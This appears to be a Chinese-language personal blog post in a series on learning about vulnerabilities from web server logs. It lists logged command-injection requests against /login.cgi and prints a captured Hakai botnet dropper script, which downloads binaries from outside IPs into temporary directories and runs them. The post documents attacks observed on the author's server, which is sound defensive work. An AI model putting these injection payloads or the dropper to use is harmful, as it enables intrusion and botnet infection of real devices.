Wey's note: 從 Web Log 學習系統漏洞 23

限制了 HTTP request method 之後少掉了不少蒼蠅, 不過還有一個還沒想到該怎擋, 每天一堆隨機IP也不曉得是不是真的

:
156.202.37.153 - - [18/Aug/2018:18:44:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 226 "-" "LMAO/2.0"

183.102.221.196 - - [19/Aug/2018:15:17:44 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"

188.18.206.66 - - [20/Aug/2018:08:51:14 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 226 "-" "LMAO/2.0"

156.222.206.186 - - [21/Aug/2018:19:13:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"

77.253.229.136 - - [22/Aug/2018:10:23:04 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 226 "-" "Shinka/1.0"

156.219.191.255 - - [23/Aug/2018:09:21:07 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"

178.46.62.239 - - [24/Aug/2018:12:34:40 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 226 "-" "Shinka/1.0"

94.50.156.196 - - [25/Aug/2018:16:42:58 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 226 "-" "Shinka/1.0"

1.54.160.147 - - [26/Aug/2018:10:13:54 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"

隨便擷取一個入侵想要我下載的東西, 就是下載後變更權限再去執行特定的程式

n="hakai.arm hakai.arm7 hakai.mips hakai.mpsl"
http_server="148.72.176.78"
dirs="/tmp/ /dev/ /dev/shm/ /var/ /var/run/ /var/tmp/"

for dir in $dirs
do
>$dir.file && cd $dir
done

for i in $n
do
cp $SHELL $i
>$i
chmod 777 $i
wget http://$http_server/$i -O- >$i
chmod 777 $i
./$i
done

Wey's note

2018年8月26日星期日

從 Web Log 學習系統漏洞 23

沒有留言:

張貼留言

2018年8月26日 星期日

從 Web Log 學習系統漏洞 23

沒有留言:

張貼留言

2018年8月26日星期日